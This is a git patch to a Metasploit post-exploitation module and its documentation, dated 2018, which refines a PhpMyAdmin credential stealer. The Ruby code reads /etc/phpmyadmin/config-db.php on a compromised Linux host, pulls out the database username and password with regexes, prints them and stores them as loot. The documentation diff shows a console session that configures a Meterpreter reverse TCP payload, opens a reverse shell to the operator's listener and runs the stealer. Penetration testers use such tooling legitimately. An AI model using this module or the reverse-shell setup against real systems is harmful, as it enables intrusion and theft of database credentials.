From 5861087061c3f3793224143a0c636961c7dc1921 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Mon, 10 Sep 2018 11:49:52 -0500 Subject: [PATCH] Land #10598, Store Credentials Found with PhpMyAdmin Password Extractor --- .../post/linux/gather/phpmyadmin_credsteal.md | 54 +++++++++---------- .../post/linux/gather/phpmyadmin_credsteal.rb | 29 +++++++--- 2 files changed, 48 insertions(+), 35 deletions(-) diff --git a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md index e848c15634..ae077120c7 100644 --- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md +++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md @@ -15,36 +15,34 @@ This post module gathers PhpMyAdmin Creds from target Linux machine. ## Scenarios ``` -msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1 -[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400 +msf5 > use multi/handler +msf5 exploit(multi/handler) > set lhost 192.168.37.1 +lhost => 192.168.37.1 +msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +msf5 exploit(multi/handler) > run -msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal -msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1 -SESSION => 1 -msf post(linux/gather/phpmyadmin_credsteal) > exploit +[*] Started reverse TCP handler on 192.168.37.1:4444 +[*] Sending stage (816260 bytes) to 192.168.37.226 +[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500 + +meterpreter > background +[*] Backgrounding session 2... +msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal +msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2 +session => 2 +msf5 post(linux/gather/phpmyadmin_credsteal) > run + + +PhpMyAdmin Creds Stealer! [+] PhpMyAdmin config found! -[+] Extracting config file! - - +msf5 post(linux/gather/phpmyadmin_credsteal) > + ``` diff --git a/modules/post/linux/gather/phpmyadmin_credsteal.rb b/modules/post/linux/gather/phpmyadmin_credsteal.rb index 7a71a794bc..df6ed91ac2 100644 --- a/modules/post/linux/gather/phpmyadmin_credsteal.rb +++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb @@ -25,32 +25,47 @@ class MetasploitModule < Msf::Post )) end - def run + def parse_creds(contents) + db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first + db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first + unless db_user && db_pass + print_error("Couldn't find PhpMyAdmin credentials") + return + end + + print_good("User: #{db_user}") + print_good("Password: #{db_pass}") + + print_status("Storing credentials...") + store_valid_credential(user: db_user, private: db_pass) + end + + def run print_line("\nPhpMyAdmin Creds Stealer!\n") - cred_dump = "" if session.platform.include?("windows") print_error("This module is not compatible with windows") return end - conf_path= "/etc/phpmyadmin/config-db.php" + conf_path = "/etc/phpmyadmin/config-db.php" unless file_exist?(conf_path) print_error("#{conf_path} doesn't exist on target") return end print_good('PhpMyAdmin config found!') - print_good("Extracting Creds") res = read_file(conf_path) unless res print_error("You may not have permissions to read the file.") return end - cred_dump << res - p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf') - print_good("Credentials saved in #{p}") + print_good("Extracting creds") + parse_creds(res) + + p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf') + print_good("Config file located at #{p}") end end